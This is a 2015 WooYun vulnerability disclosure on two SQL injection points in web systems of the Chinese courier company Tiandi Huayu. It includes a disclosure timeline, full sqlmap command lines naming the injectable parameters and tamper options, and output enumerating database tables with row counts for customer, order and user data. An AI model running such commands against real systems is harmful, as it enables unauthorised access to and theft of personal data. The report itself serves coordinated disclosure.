当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139189

漏洞标题:快递安全之天地华宇两处SQL注入涉及大量信息

相关厂商:天地华宇

漏洞作者: lightless

提交时间:2015-09-10 21:11

修复时间:2015-10-26 10:52

公开时间:2015-10-26 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

人形神器~

详细说明:

两处注入点
Case 1:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464" -p ebProductTypeId --random-agent --tamper=space2comment -D "thoms" --tables --count


Case 2:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**/05xgnew/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTUwOTQ0NDQ3MWRktA6PBCi8proujSc4OHkUB7epxyA%3D&gh=1&mm=1&btn=%B5%C7%C2%BC&__EVENTVALIDATION=%2FwEWBAK%2FjdP5AQK578rvDALD77bvDAKSoqqWD8OU6dcTGppipGwM0u%2B3IgB7ezme" -p gh --random-agent --dbs


Case2是基于时间的盲注,太慢了。。

漏洞证明:

Case 1:

Database: thoms
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.CD_STATUS_HISTORY | 7876790 |
| dbo.EO_ORDER_MATERIEL | 1763946 |
| dbo.OMS_DC_ORDER | 1242568 |
| dbo.EO_ORDER_EXCEPTION_HISTORY | 460400 |
| dbo.EB_MOBILE_CONTACT | 417779 |
| dbo.EB_PRODUCT_DETAIL | 400910 |
| dbo.EO_DISTPACH_VEHICLE | 384321 |
| dbo.EI_ALIBABA_ORDER_STATUS | 380105 |
| dbo.EB_PRODUCT_DETAIL_BACK | 285028 |
| dbo.EO_ORDER | 159037 |
| dbo.EI_TAOBAO_CARGO | 122364 |
| dbo.EB_SATISFY | 72506 |
| dbo.EI_TAOBAO_ORDER | 59354 |
| dbo.EI_NET_ORDER | 30599 |
| dbo.TMP_PRICE | 23231 |
| dbo.EB_CUSTOMER | 22919 |
| dbo.EB_CUSTOMER_CONTACT | 22904 |
| dbo.EB_NET_SERIAL | 17053 |
| dbo.EB_OMS_HR | 16905 |
| dbo.CD_MESSAGE_CONTEXT | 13739 |
| dbo.EO_ORDER_EXCEPTION | 13157 |
| dbo.EB_SHIPPER_ADDRESS | 9638 |
| dbo.OMS_PRICE_FREIGHT | 5791 |
| dbo.EI_NET_ORDER_RECORD | 5246 |
| dbo.EB_DISCOUNT | 4216 |
| dbo.ES_ESUG_2_ESUS | 3671 |
| dbo.ES_USER | 3660 |
| dbo.EB_PLACE | 3409 |
| dbo.EB_PLACE_BAK | 3409 |
| dbo.EB_PLACE_PMS | 3398 |
| dbo.EI_CUSTOMER_ORDER_CARGO | 3151 |
| dbo.EI_CUSTOMER_ORDER | 3147 |
| dbo.EB_CUSTOMER_DISCOUNT | 3006 |
| dbo.tmp_city_con | 2997 |
| dbo.EB_VEHICLE | 2554 |
| dbo.ES_CONTROL_PARAM | 1978 |
| dbo.ES_ESCO_2_ESCP | 1967 |
| dbo.ES_COMPANY | 1802 |
| dbo.EB_OUT_CUSTOMER | 726 |
| dbo.ES_ESRO_2_ESFR | 666 |
| dbo.EB_CODE_MASTER | 651 |
| dbo.ES_ESHP_2_ESCO | 625 |
| dbo.ES_FUNCTION_RESOURCE | 444 |
| dbo.ES_FUNCTION_PERMISSION | 361 |
| dbo.EB_CODE_MASTER_TYPE | 113 |
| dbo.ES_ESHP_2_ESUS | 89 |
| dbo.ES_HOOD_PLATFORM | 86 |
| dbo.ES_ESIE_2_ESDR | 72 |
| dbo.CD_STATUS_ACTION | 67 |
| dbo.ES_DATASOURCE_RES | 67 |
| dbo.CD_EXCEPTION_ITEM | 50 |
| dbo.CD_ACTION_DEFINED | 29 |
| dbo.CD_ACTION_DEFINED_copy | 29 |
| dbo.ES_ESUG_2_ESRO | 28 |
| dbo.CD_STATUSES_DETAIL | 22 |
| dbo.EB_ORDER_TYPE | 22 |
| dbo.EB_CUSTOMER_ROLE | 16 |
| dbo.ES_USER_2_POST | 16 |
| dbo.ES_ROLE | 12 |
| dbo.ES_USER_GROUP | 11 |
| dbo.EB_SHIPPER | 8 |
| dbo.CD_STATUS_SMS | 6 |
| dbo.CD_NOTIFY_EXCEPTION | 5 |
| dbo.CD_TIMER_ACTION | 5 |
| dbo.CD_TIMER_DEFINE | 5 |
| dbo.EB_CUSTOMER_URL | 4 |
| dbo.EB_EBPJ_2_ESUS | 4 |
| dbo.EB_SERVICES | 4 |
| dbo.ES_COUNTER | 4 |
| dbo.ES_DATASOURCE | 4 |
| dbo.ES_DIY_REPORT | 4 |
| dbo.CD_BILL_NO_RULE | 3 |
| dbo.EB_PRODUCT_TYPE | 3 |
| dbo.OMS_PRICE_CUSTOMER | 3 |
| dbo.OMS_PRICE_HEAD | 3 |
| dbo.CD_STATUSES_HEADER | 2 |
| dbo.COUNTY_FIRSTCOMPANY | 2 |
| dbo.EB_CUSTOMER_CHECK | 2 |
| dbo.EB_CUSTOMER_MILEAGE | 2 |
| dbo.EB_EBCU_2_EBSP | 2 |
| dbo.EB_REGION | 2 |
| dbo.EO_TYPE_CONTENT | 2 |
| dbo.TMP_CITY | 2 |
| dbo.DISCOUNT | 1 |
| dbo.EB_CERTIFICATION | 1 |
| dbo.EB_EBPJ_2_EBCC | 1 |
| dbo.EB_FEE_HEAD | 1 |
| dbo.EB_LINE | 1 |
| dbo.EB_ORDER_TASK | 1 |
| dbo.EB_PORT | 1 |
| dbo.EB_PROJECT | 1 |
| dbo.EO_ORDER_ANOMALY | 1 |
| dbo.ES_DEPARTMENT | 1 |
| dbo.ES_ESDA_2_ESCO | 1 |
| dbo.ES_MESSAGE_TYPE | 1 |
| dbo.ES_STATION | 1 |
+--------------------------------+---------+


1.png


Case 2:

2.png


3.png


4.png


太慢了不跑了,证明问题即可。

修复方案:

过滤、废弃系统及时下线。

版权声明:转载请注明来源 lightless@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-09-11 10:50

厂商回复:

CNVD未复现所述情况,暂未列入处置流程。

最新状态:

暂无